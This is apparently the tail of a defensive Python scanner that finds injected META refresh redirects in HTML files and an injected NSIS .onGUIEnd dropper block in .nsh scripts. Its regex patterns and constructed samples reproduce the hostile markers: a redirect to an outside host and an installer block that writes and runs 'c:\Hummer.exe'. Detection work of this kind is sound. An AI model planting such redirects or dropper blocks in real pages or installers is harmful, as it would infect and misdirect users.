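    r'ExecShell\s+"open"\s+"c:\\Hummer\.exe"(?:(?!FunctionEnd).)*?FunctionEnd',
    re.IGNORECASE | re.DOTALL,
)

def check_html(text: str) -> Tuple[List[str], str]:
    """Return (malicious redirect URLs, document with those tags cut out). A tag is
    malicious if it follows the last </html> (appended) or targets the known host."""
    last_close = 0
    for m in CLOSING_HTML_RE.finditer(text):
        last_close = m.end()
    hits: List[str] = []
    cleaned = text
    # Cut from the end backwards so earlier match offsets stay valid.
    for m in reversed(list(META_REFRESH_RE.finditer(text))):
        url = m.group(1).strip()
        appended = last_close > 0 and m.start() >= last_close
        if appended or KNOWN_REDIRECT_HOST in url.lower():
            hits.append(url)
            cleaned = cleaned[: m.start()] + cleaned[m.end():]
    hits.reverse()
    return hits, cleaned

def check_nsh(text: str) -> bool:
    """True when the NSIS script carries the injected dropper block."""
    return NSH_INJECT_RE.search(text) is not None

def scan_tree(root: Path) -> List[Tuple[Path, str]]:
    """Report (path, finding) pairs for a directory tree; files are left untouched."""
    findings: List[Tuple[Path, str]] = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".htm", ".html", ".nsh"):
            continue
        text = path.read_text(errors="replace")
        if path.suffix.lower() == ".nsh":
            if check_nsh(text):
                findings.append((path, "injected .onGUIEnd dropper block"))
        else:
            for url in check_html(text)[0]:
                findings.append((path, "appended META refresh to " + url))
    return findings

# Constructed samples reproducing the markers quoted in the writeup.
SAMPLE_HTML = (
    "<html><body><p>Opening hours</p></body></html>\n"
    "<META http-equiv='refresh' content='1;URL=http://www.raila2007.com'>"
)
SAMPLE_NSH = r"""!include "C:\Program Files\NSIS\Contrib\Modern UI\System.nsh"
!define REDIRECT_ME "redirect"
!ifdef REDIRECT_ME
Function .onGUIEnd
SetOutPath "c:\"
File "$WHEREIS\$filename"
ExecShell "open" "c:\Hummer.exe"
FunctionEnd
!endif
"""

if __name__ == "__main__":
    print(check_html(SAMPLE_HTML)[0], check_nsh(SAMPLE_NSH))
```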
